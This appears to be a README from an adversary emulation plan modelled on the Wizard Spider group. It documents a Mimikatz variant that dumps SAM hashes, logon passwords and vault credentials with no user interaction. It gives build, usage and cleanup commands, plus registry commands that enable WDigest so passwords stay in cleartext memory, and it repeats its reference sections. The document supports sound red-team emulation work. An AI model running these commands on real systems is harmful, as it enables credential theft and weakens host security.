#
Mimikatz
A variant of Mimikatz that executes lsadump::sam, sekurlsa::logonpasswords, and vault::list without user interaction.
#
Build Instructions
Open the command prompt (cmd.exe), navigate to directory containing the Mimikatz Visual Studio solution file (mimikatz.sln), and run the devenv.exe command:
cd wizard_spider\Resources\Mimikatz "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe" mimikatz.sln /build Release
The executable will be found in the x64 folder.
#
Test Instructions
Open PowerShell
cd wizard_spider\Resources\Mimikatz\mimikatz mimikatz_test.ps1
#
Usage Examples
#
execute all (lsadump::sam, sekurlsa::logonpasswords, and vault::list)
mimikatz.exe
#
execute lsadump::sam
mimikatz.exe s
#
execute sekurlsa::logonpasswords
mimikatz.exe l
#
execute vault::list
mimikatz.exe v
#
Cleanup Instructions
Open a command prompt or PowerShell
del mimikatz.exe
#
Misc
To force credentials to be stored in cleartext in memory, Wizard Spider enables WDigest by modifying the registry (must be done as admin):
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 or (PowerShell) Set-ItemProperty -Path "HKLM:SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name UseLogonCredential -Value 1
For the changes to take effect, you must log out and log back in or restart the host.
Verify the change with:
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest or (PowerShell) Get-ItemProperty -Path "HKLM:SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
Challenges:
- Need credentials to log back in, or voice track that the victim logs back in.
#
CTI Evidence
https://attack.mitre.org/groups/G0102/ https://www.hhs.gov/sites/default/files/trickbot.pdf https://us-cert.cisa.gov/ncas/alerts/aa20-302a https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
#
References
https://github.com/gentilkiwi/mimikatz https://docs.microsoft.com/en-us/visualstudio/ide/reference/build-devenv-exe?view=vs-2019
#
CTI Evidence
https://attack.mitre.org/groups/G0102/ https://www.hhs.gov/sites/default/files/trickbot.pdf https://us-cert.cisa.gov/ncas/alerts/aa20-302a https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
#
References
https://github.com/gentilkiwi/mimikatz https://docs.microsoft.com/en-us/visualstudio/ide/reference/build-devenv-exe?view=vs-2019